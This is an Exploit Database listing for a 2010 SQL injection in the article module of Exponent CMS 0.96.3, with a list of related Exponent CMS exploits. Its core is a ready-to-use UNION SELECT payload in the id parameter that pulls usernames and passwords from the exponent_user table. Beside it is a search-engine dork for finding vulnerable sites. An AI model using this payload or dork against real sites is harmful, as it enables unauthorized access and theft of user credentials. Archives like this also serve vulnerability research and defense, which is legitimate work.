Exploit Database - Logo

Exponent CMS 0.96.3 - 'articlemodule' SQL Injection

EDB-ID: 11349 Author: T u R c O Published: 2010-02-07
CVE: N/A Type: Webapps Platform: PHP GHDB-ID: 2147
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability 
======================================================== 
  
#################################################################### 
# Author : T u R c O
# Home   : www.1923Turk.com
# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule
              
  
#################################################################### 
  
===[ Exploit ]=== 
  
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
  
  -1+union+select+1,2,3,password,username,6+from+exponent_user--

Demo:

http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--

   
####################################################################
« Previous Exploit Next Exploit »

Related Exploits

Trying to match setup file: 627ff741e205cbb4ea699bb28a1f63e9
Other Possible E-DB Search Terms: Exponent CMS 0.96.3,  Exponent CMS
Date D V Title Author
2005-12-25 Verified Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilitiesy3dips
2007-04-20 Verified Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php?icodir' Traversal Arbitrary Directory ListingHamid Ebadi
2007-04-20 Verified Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site ScriptingHamid Ebadi
2007-04-20 Verified Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site ScriptingHamid Ebadi
2010-07-07 Verified Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site ScriptingAndrei Rims...
2012-03-07 Verified Exponent CMS 2.0 - 'src' SQL InjectionRob Miller
2011-05-02 Waiting verification Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account)outlaw.dll
2011-05-09 Verified Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File UploadAutoSec Tools
2013-05-17 Waiting verification Exponent CMS 2.2.0 Beta 3 - Multiple VulnerabilitiesHigh-Tech B...
2006-09-19 Verified Exponent CMS 0.96.3 - 'view' Remote Command Executionrgod
2010-10-13 Verified Exponent CMS 0.97 - Multiple VulnerabilitiesLiquidWorm
2015-02-12 Waiting verification Exponent CMS 2.3.1 - Multiple Cross-Site Scripting VulnerabilitiesMayuresh Dani
2016-09-22 Waiting verification Exponent CMS 2.3.9 - Blind SQL InjectionManuel Garc...
Menu